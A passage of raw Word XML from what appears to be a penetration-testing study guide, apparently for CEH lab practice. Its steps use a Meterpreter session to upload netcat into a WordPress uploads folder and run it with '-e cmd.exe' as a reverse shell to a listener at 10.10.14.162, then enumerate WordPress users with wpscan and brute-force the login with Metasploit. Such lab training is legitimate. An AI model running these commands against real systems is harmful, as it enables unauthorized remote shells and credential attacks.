              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1506B373" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>Next, we need to upload a reverse shell script to get a more stable shell.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D1F0F48" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t xml:space="preserve">First off, use </w:t>
            </w:r>
            <w:r w:rsidRPr="00D802C5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">locate </w:t>
            </w:r>
            <w:r w:rsidRPr="00D802C5">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nc.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D802C5">
              <w:t>to find where you have your copy of netcat.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B9A0217" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>Either use this file or use the copy command to move it into a directory where you would like it.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4F0A65" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRPr="00370C7B" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00370C7B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">locate </w:t>
            </w:r>
            <w:r w:rsidRPr="00370C7B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nc.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00370C7B">
              <w:t>Now, highlight and copy the realpath shown.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094E76AC" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRPr="00370C7B" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00370C7B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">PASTE_REALPATH ~/ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Instead of ~/ use any folder you would like.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="0B7D8EB0" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74BD5FD2" w14:textId="369760C4" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2011E863" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6A0CE36C" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>We will need to background the meterpreter shell and thus get back onto msfconsole.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A593E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>background</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B84EA1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B84EA1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Or, wherever the file is now saved.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Now, get back onto the meterpreter shell, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A593E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sessions</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000A593E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Replacing the # for the session number it was allocated.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Now we need to upload the file in a directory with write permissions:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A593E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidRPr="000A593E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000A593E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Use these commands to map out where you are in the system and move back out of folders until you can find a suitable place to upload the file. A folder named ‘uploads’ is usually a good choice. For example…</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>C:/inetpub/wwwroot/wordpress/wp-content/uploads</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:t>Now, upload the nc.exe:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">upload </w:t>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nc.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:t xml:space="preserve">Or you could </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57533">
              <w:t>here</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C57533">
              <w:t xml:space="preserve"> copy and paste the realpath location.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Use ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r>
              <w:t>’ to double-check it is in the directory.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="60B5903D" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AD7B15A" w14:textId="7D2B05F1" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FBBCB78" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>terminal/netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1279AB84" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>Open a new terminal window, and type:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-lvp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>1234</w:t>
            </w:r>
            <w:r w:rsidRPr="00C57533">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Or any available port number.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>This will start a netcat listening server on our machine on the specified port number.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="75073A51" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="306B5139" w14:textId="07579B70" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2017C21D" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4A7E942C" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>Now we are ready to run the netcat file.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00356C8A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">execute </w:t>
            </w:r>
            <w:r w:rsidRPr="00356C8A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidRPr="00356C8A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">nc.exe </w:t>
            </w:r>
            <w:r w:rsidRPr="00356C8A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-a </w:t>
            </w:r>
            <w:r w:rsidRPr="00356C8A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">“-e cmd.exe </w:t>
            </w:r>
            <w:r w:rsidRPr="00356C8A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.14.162 1234</w:t>
            </w:r>
            <w:r w:rsidRPr="00356C8A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Be sure to change IP address for the interface you are connecting on and change the port number for the same number as the netcat server you started in step .f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="67FE72E1" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="31552991" w14:textId="6BA81915" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B286822" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="482FACA1" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t xml:space="preserve">Check back on the terminal you started the netcat listener on and we should have a connection! See </w:t>
            </w:r>
            <w:r w:rsidRPr="00ED083E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>‘WordPress Exploitation With MSF wp_admin_shell_upload and Juicy Potato’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> below for further ways to escalate privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="0C480275" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="278A0C23" w14:textId="1BD0E7F5" w:rsidR="00175FBE" w:rsidRDefault="00190FDB" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00175FBE">
              <w:t>.i</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="760071DA" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>wpscan</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A1CC1EB" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC">
            <w:r>
              <w:t>If you want to find possible usernames for a WordPress login, you can use WPSscan:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>wpscan</w:t>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--url </w:t>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http://10.10.10.16:8080/CEH </w:t>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--enumerate u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:t>Then, you can attempt to brute force a login using msfconsole:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>use</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>auxiliary/scanner/http/wordpress_login_enum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">USERNAME </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Or, whatever we think the username is)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00552DEC">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS_FILE </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>WORDLIST.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>RHOSTS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>10.10.10.16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>RPORT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>set</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>TARGETURI</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00175FBE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://10.10.10.16:8080/CEH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00175FBE" w14:paraId="04AE734B" w14:textId="77777777" w:rsidTr="00190FDB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="66FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4192EAD1" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3C472320" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="101B5C3E" w14:textId="77777777" w:rsidR="00175FBE" w:rsidRPr="00D806EE" w:rsidRDefault="00175FBE" w:rsidP="00FE5DDC"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06BEF73A" w14:textId="2018F103" w:rsidR="00F15476" w:rsidRDefault="00F15476">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F113C" w14:textId="7D534F54" w:rsidR="00F15476" w:rsidRPr="00F15476" w:rsidRDefault="00F15476" w:rsidP="00F15476">
      <w:pPr>
